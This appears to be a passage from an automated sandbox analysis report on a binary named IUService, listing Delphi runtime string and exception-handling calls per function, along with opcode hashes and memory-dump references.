                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20EnsureString$qqrr20$Asg$qqrr20CompareCopy$qqrx20Len$qqrx20StringiiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4220554184-0
                                                                                                                                            • Opcode ID: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                                                            • Instruction ID: 0917f6d901124ccc03c99a1b7cbd9fd473add03b710357cd351074ee3f025ca5
                                                                                                                                            • Opcode Fuzzy Hash: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                                                            • Instruction Fuzzy Hash: 7F41C530A016969FDF41DFB8E951A9EF7F9EF84200F504266E940D7246D770DE41C741
                                                                                                                                            Function 5002A640 Relevance: 16.6, APIs: 11, Instructions: 118COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A67B
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A686
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6A3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B2
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B7
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6E5
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A6F7
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A720
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A733
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A758
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Sysutils@$String$qqrpxcxi$Len$qqrpxcStringUnicode$Except$qqrvException@$bctr$qqrx20ExtractFileLoadModuleName$qqruiName$qqrx20RaiseRecxiString$qqrp20Stringpx14System@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1154392791-0
                                                                                                                                            • Opcode ID: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                                                            • Instruction ID: 490cf656cc89e769677ed1d8ac02a07099c920838aaedf4d8d0b1e3e7b1f0adf
                                                                                                                                            • Opcode Fuzzy Hash: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                                                            • Instruction Fuzzy Hash: FF41D474A0168A9FDB04CF94DC91ADEB7F4EF18304F40467AE905E7241EA34AE05CBA0
                                                                                                                                            Function 50011698 Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500117DF), ref: 500116C6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 500116E3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001171B
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500117DF), ref: 5001174C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500117DF), ref: 50011751
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001176E
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500117DF), ref: 5001177A
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500117DF), ref: 50011788
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,500117DF), ref: 50011798
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1016462649-0
                                                                                                                                            • Opcode ID: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                                                            • Instruction ID: d8a2c921cb0381c3f4e4b64832713658ab93ef8ffd1cbe9df7beed8a80b09d51
                                                                                                                                            • Opcode Fuzzy Hash: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                                                            • Instruction Fuzzy Hash: D541E234A081899FDF15DFA8EC816EDB7F5AF04200F5842A6E540E7391E7749E86C791
                                                                                                                                            Function 50010ADC Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010C23), ref: 50010B0A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B27
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B5F
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010C23), ref: 50010B90
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010C23), ref: 50010B95
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010BB2
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010C23), ref: 50010BBE
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010C23), ref: 50010BCC
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010C23), ref: 50010BDC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1016462649-0
                                                                                                                                            • Opcode ID: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                                                            • Instruction ID: e0cb8508ea0ee3c123a5ca94656853c590a1bcf096955fea472a91734319ba04
                                                                                                                                            • Opcode Fuzzy Hash: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                                                            • Instruction Fuzzy Hash: 2041C334A042899BDF11DFA8EC815EFB7F5AF44304F5043A6E980E7256D7B49E85D780
                                                                                                                                            Function 50011878 Relevance: 16.6, APIs: 11, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500119B9), ref: 500118A6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118C3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118FB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500119B9), ref: 5001192C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500119B9), ref: 50011931
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 5001194E
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500119B9), ref: 5001195A
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500119B9), ref: 50011992
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,500119B9), ref: 50011997
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2188507345-0
                                                                                                                                            • Opcode ID: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                                                            • Instruction ID: 70db1d6cf51ae63cbd989f7e97dabe6d18dd781c46a6f130b903eaa5e37548f1
                                                                                                                                            • Opcode Fuzzy Hash: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                                                            • Instruction Fuzzy Hash: B531A030A00289ABEF15DFA4ECA16EDB7F9EF45300F984266E950D7241EB709EC1D791
                                                                                                                                            Function 5001113C Relevance: 16.6, APIs: 11, Instructions: 106COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011268), ref: 5001116A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011187
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 500111BF
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011268), ref: 500111F0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011268), ref: 500111F5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011212
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011268), ref: 5001121E
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011268), ref: 5001122C
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,50011268), ref: 50011231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2188507345-0
                                                                                                                                            • Opcode ID: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                                                            • Instruction ID: 5ac73815b234001b978d6f963799290576de029f4385e846c2353e19faa8a449
                                                                                                                                            • Opcode Fuzzy Hash: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                                                            • Instruction Fuzzy Hash: E831E130A00289ABDF05DFA4EC916EEB7F5EF55200F5442A6EA00E7641D7709E82C781
                                                                                                                                            Function 5002B33C Relevance: 16.6, APIs: 11, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B37F
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B391
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A1
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3C6
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3DB
                                                                                                                                            • @System@@DynArrayHigh$qqrv.RTL120 ref: 5002B3E6
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B408
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B416
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$ArrayStringStringx20$Asg$qqrr20Length$qqrv$Cat3$qqrr20Char$qqrr20Copy$qqrx20FromHigh$qqrvInt$qqrx20StringiiStringpbStringt2Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2891979734-0
                                                                                                                                            • Opcode ID: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                                                            • Instruction ID: 33f49da7cf7d534711dd3b735e4964b946f028d1e955376cf8d5b37d4a493396
                                                                                                                                            • Opcode Fuzzy Hash: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                                                            • Instruction Fuzzy Hash: CB313274A01189DBEB00EF94E991AAEB7B8EF44300F508276E9059B356DB34EE45CB90
                                                                                                                                            Function 50030940 Relevance: 16.6, APIs: 11, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50030A24), ref: 500309A6
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50030A24), ref: 500309A1
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50030A24), ref: 50030992
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 50030975
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309B2
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309C6
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030A24), ref: 500309E3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030A24), ref: 500309F2
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030A24), ref: 500309F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Stringx20$LoadRaiseRecxiStringpx14Sysutils@Text$qqrxusTypeVariants@$Asg$qqrr20Cat3$qqrr20Except$qqrvException@$bctr$qqrx20String$qqrp20Stringt2$CharClassClassoCreate$qqrp17Error$qqrucFindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3925043654-0
                                                                                                                                            • Opcode ID: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                                                            • Instruction ID: 4ca92997f7d99f258bade771785e71a5bab742ac08337daf03ab8f9c2463306d
